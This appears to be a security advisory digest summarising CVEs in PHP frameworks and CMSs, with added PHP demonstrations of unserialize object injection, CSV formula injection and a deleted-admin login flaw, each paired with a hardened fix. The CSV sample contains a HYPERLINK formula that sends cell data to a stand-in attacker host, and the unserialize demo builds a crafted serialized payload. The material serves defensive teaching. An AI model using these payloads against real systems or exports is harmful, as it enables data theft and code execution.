CVE-2021-32649
CVE-2021-32649 affects October CMS (Laravel-based). Before versions 1.0.473 and 1.1.6, an attacker with backend privileges to create, modify and delete website pages can trigger PHP code execution by embedding specially crafted Twig code in the template markup. The issue is remedied in Build 473...
CVE-2021-32649 Authenticated file write leads to remote code execution in october/system
October CMS is a self-hosted content management system (CMS) platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with "create, modify and delete website pages" privileges in the backend is able to execute PHP code by running specially crafted Twig code in t...
CVE-2021-32650 Arbitrary code execution in october/system
October CMS is a self-hosted content management system (CMS) platform based on the Laravel PHP Framework. Prior to versions 1.0.473 and 1.1.6, an attacker with access to the backend is able to execute PHP code by using the theme import feature. This will bypass the safe mode feature that prevents P...
CVE-2022-21647 Deserialization of Untrusted Data in Codeigniter4
CodeIgniter is an open source PHP full-stack web framework. Deserialization of Untrusted Data was found in the `old()` function in CodeIgniter4. Remote attackers may inject auto-loadable arbitrary objects with this vulnerability, and possibly execute existing PHP code on the server. We are aware of a...
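The bug class in the CodeIgniter4 entry above, as an added example written for this page and not CodeIgniter's own code: a hypothetical gadget class (`TempFile`) whose destructor has a side effect, the `unserialize()` call that lets an attacker-supplied string instantiate it, and two hardened alternatives. The class, the function names, the temp file and the payload string are all constructed for the demonstration. Requires PHP 8 (constructor promotion, `mixed`).

```php
<?php
declare(strict_types=1);

// Hypothetical gadget: any class that is already loaded (or autoloadable) in
// the application and has a side effect in a magic method. The attacker never
// calls it; PHP runs __destruct when the injected object goes out of scope.
final class TempFile
{
    public function __construct(public string $path) {}

    public function __destruct()
    {
        if (is_file($this->path)) {
            @unlink($this->path);
        }
    }
}

// Vulnerable pattern: the serialized string decides which class gets built.
function restoreVulnerable(string $serialized): mixed
{
    return unserialize($serialized);
}

// Hardened (a): keep PHP's format but refuse every class. An object payload
// is materialised as __PHP_Incomplete_Class, whose magic methods never run.
function restoreNoObjects(string $serialized): mixed
{
    return unserialize($serialized, ['allowed_classes' => false]);
}

// Hardened (b): do not use PHP's native serialization for untrusted state.
function restoreJson(string $json): mixed
{
    return json_decode($json, true, 512, JSON_THROW_ON_ERROR);
}

// Constructed demo. The file stands in for anything the gadget can reach.
$victim = sys_get_temp_dir() . '/unserialize-demo-' . bin2hex(random_bytes(4));
touch($victim);

// Payload written by hand rather than via serialize(), which would itself
// create a live TempFile whose destructor would delete the file.
$payload = sprintf('O:8:"TempFile":1:{s:4:"path";s:%d:"%s";}', strlen($victim), $victim);

$obj = restoreNoObjects($payload);
echo 'allowed_classes=false gives ', get_class($obj),
     '; file still exists: ', var_export(is_file($victim), true), "\n";
unset($obj);

try {
    restoreJson($payload);
} catch (JsonException $e) {
    echo 'json_decode rejects the payload: ', $e->getMessage(), "\n";
}

// The returned object is discarded at once, so its destructor runs here.
restoreVulnerable($payload);
echo 'after plain unserialize(), file still exists: ', var_export(is_file($victim), true), "\n";
```

The allow-list form is the smallest change when the stored data genuinely needs to survive a round trip; `allowed_classes` may also be an explicit list of class names, but every class on that list becomes part of the attack surface, so prefer the JSON route for anything that originates from a request.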
Unauthorized Access Vulnerability in BossCMS
BossCMS is a content management system based on a self-developed PHP framework and MySQL, developed by Wenzhou Huyin Information Technology Co. An unauthorized access vulnerability exists in BossCMS, which can be exploited by attackers to obtain sensitive information...
Arbitrary File Upload Vulnerability in BossCMS
BossCMS is a content management system based on a self-developed PHP framework and MySQL, developed by Wenzhou Huyin Information Technology Co. BossCMS has an arbitrary file upload vulnerability that can be exploited by attackers to gain control of the server...
Laravel Framework OS Command Injection Vulnerability
Laravel Framework is a PHP-based web application development framework by Taylor Otwell, an individual developer. A security vulnerability exists in Laravel Framework prior to version 5.8.17: a command injection flaw caused by a lack of filtering and...
Fedora: Security Advisory for php-symfony4 (FEDORA-2021-0294e8ca24)
The remote host is missing an update for php-symfony4 (advisory FEDORA-2021-0294e8ca24). Copyright (C) 2021 Greenbone Networks GmbH. Some text descriptions might be excerpted from referenced sources and are Copyright (C) by the respective right holders. SPDX-License-Identifier: GPL-2.0-or-later. This program is free software; you can...
[SECURITY] Fedora 34 Update: php-symfony4-4.4.35-1.fc34
Symfony PHP framework version 4. NOTE: Does not require PHPUnit bridge...
CVE-2021-41270
Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula...
Design/Logic Flaw
Symfony/Serializer handles serializing and deserializing data structures for Symfony, a PHP framework for web and console applications and a set of reusable PHP components. Symfony versions 4.1.0 before 4.4.35 and versions 5.0.0 before 5.3.12 are vulnerable to CSV injection, also known as formula...
CVE-2021-41270
CVE-2021-41270 (Symfony CSV Injection) affects Symfony/Serializer in the Symfony PHP framework. The issue arises in the CsvEncoder, where cells beginning with =, +, -, or @ could be treated as formulas by a spreadsheet application. Initially, a tab prefix was used to escape these, but OWASP expanded the vulnerable set to include ...
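The escaping described in the CVE-2021-41270 entries above, as an added example written for this page and not Symfony's CsvEncoder code: a stand-alone PHP CSV writer that prepends a tab to any cell starting with a formula trigger. The trigger list includes the tab and carriage return characters from the OWASP CSV injection guidance, which is the expansion the entry refers to. The function names and the sample rows are constructed for the demonstration; the `escapeFormulas` switch reproduces the unescaped output alongside the hardened one.

```php
<?php
declare(strict_types=1);

// Bytes that spreadsheet applications may treat as the start of a formula.
// '=', '+', '-', '@' are the classic set; "\t" and "\r" are the OWASP additions.
const FORMULA_TRIGGERS = ['=', '+', '-', '@', "\t", "\r"];

// Tab-prefix a cell whose first byte is a formula trigger, so the spreadsheet
// reads it as text. Only the first byte matters: a formula is recognised by
// its leading character, not by anything later in the cell.
function escapeFormulaCell(string $cell): string
{
    if ($cell === '') {
        return $cell;
    }
    return in_array($cell[0], FORMULA_TRIGGERS, true) ? "\t" . $cell : $cell;
}

// Encode rows as CSV (RFC 4180 quoting via fputcsv). $escapeFormulas = false
// reproduces the vulnerable behaviour: user data reaches the file verbatim.
function encodeCsv(array $rows, bool $escapeFormulas = true): string
{
    $out = fopen('php://memory', 'r+');
    foreach ($rows as $row) {
        $cells = array_map(
            fn($v) => $escapeFormulas ? escapeFormulaCell((string) $v) : (string) $v,
            $row
        );
        fputcsv($out, $cells);
    }
    rewind($out);
    $csv = stream_get_contents($out);
    fclose($out);
    return $csv;
}

// Constructed sample: "name" values a user could have typed into a profile
// form, two of which a spreadsheet would evaluate rather than display.
$rows = [
    ['id', 'name', 'note'],
    [1, '=HYPERLINK("http://attacker.example/?c="&B2,"click me")', 'exfiltrates the cell next to it'],
    [2, "\t=1+1", 'leading tab is a trigger too'],
    [3, '-5', 'negative numbers are caught as well'],
    [4, 'O\'Brien', 'ordinary text is left alone'],
];

echo "--- vulnerable (no escaping) ---\n", encodeCsv($rows, false);
echo "--- hardened (tab prefix) ---\n", encodeCsv($rows, true);
```

Caveats a practitioner should keep in mind: the tab prefix changes the stored value, so round-tripping the file back into the application must strip it again; and the same escaping is needed for any other spreadsheet-bound export (TSV, XLSX cell strings), not only for CSV.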
CVE-2021-41126
October is a content management system (CMS) and web platform built on the Laravel PHP Framework. In affected versions administrator accounts which had previously been deleted may still be able to sign in to the backend using October CMS v2.0. The issue has been patched in v2.1.12 of the...
CVE-2021-41126 Deleted Admin Can Sign In to Admin Interface
October is a content management system (CMS) and web platform built on the Laravel PHP Framework. In affected versions administrator accounts which had previously been deleted may still be able to sign in to the backend using October CMS v2.0. The issue has been patched in v2.1.12 of the...
CVE-2021-41126
CVE-2021-41126 affects October CMS (built on Laravel). The issue allows an administrator account that was previously deleted to still sign in to the backend when using October CMS v2.0. This vulnerability is addressed by upgrading the october/october package to v2.1.12. The available connected so...
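The entries above say that a deleted administrator could still sign in, but not why. This added example (written for this page, not October CMS code) assumes the usual cause for this bug class: accounts are soft-deleted by setting a `deleted_at` column, and the login lookup matches on the login name without filtering that column. The table, function names and credentials are constructed for the demonstration.

```php
<?php
declare(strict_types=1);

// Constructed stand-in for a backend users table. Both rows hold valid
// credentials; bob was soft-deleted (deleted_at set) and must not sign in.
function sampleUsers(): array
{
    return [
        ['id' => 1, 'login' => 'alice', 'hash' => password_hash('correct horse', PASSWORD_DEFAULT), 'deleted_at' => null],
        ['id' => 2, 'login' => 'bob',   'hash' => password_hash('battery staple', PASSWORD_DEFAULT), 'deleted_at' => '2021-10-01 12:00:00'],
    ];
}

// Vulnerable lookup: matches on login only, so a soft-deleted row is still a
// candidate for authentication. SQL equivalent:
//   SELECT * FROM backend_users WHERE login = ?
function findUserVulnerable(array $users, string $login): ?array
{
    foreach ($users as $u) {
        if ($u['login'] === $login) {
            return $u;
        }
    }
    return null;
}

// Hardened lookup: a deleted account does not exist for the login path.
// SQL equivalent:
//   SELECT * FROM backend_users WHERE login = ? AND deleted_at IS NULL
function findUserHardened(array $users, string $login): ?array
{
    foreach ($users as $u) {
        if ($u['deleted_at'] === null && $u['login'] === $login) {
            return $u;
        }
    }
    return null;
}

// Password check is identical in both cases; the flaw is purely in which rows
// the lookup is willing to hand to it.
function authenticate(callable $finder, array $users, string $login, string $password): bool
{
    $u = $finder($users, $login);
    if ($u === null) {
        return false;
    }
    return password_verify($password, $u['hash']);
}

$users = sampleUsers();
foreach (['findUserVulnerable', 'findUserHardened'] as $finder) {
    printf(
        "%-18s alice: %-5s  bob (deleted): %s\n",
        $finder,
        var_export(authenticate($finder, $users, 'alice', 'correct horse'), true),
        var_export(authenticate($finder, $users, 'bob', 'battery staple'), true)
    );
}
```

Blocking the login path is only half of the fix: sessions and remember-me tokens issued before the deletion stay valid unless deletion also revokes them, so the same `deleted_at IS NULL` condition belongs in whatever resolves a session back to a user.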
WTCMS Cross-Site Request Forgery Vulnerability
WTCMS is a content management system (CMS) based on ThinkPHP. index.php?g=admin in WTCMS...
WTCMS Cross-Site Scripting Vulnerability
WTCMS is a content management system (CMS) based on ThinkPHP. A cross-site scripting vulnerability exists in the link fields under the menu management module of the WTCMS backend. No further details are provided at this time...
CVE-2021-29487
octobercms is a CMS platform based on the Laravel PHP Framework. In affected versions of the october/system package an attacker can exploit this vulnerability to bypass authentication and take over any user account on an October CMS server. The vulnerability is exploitable by unauthenticated...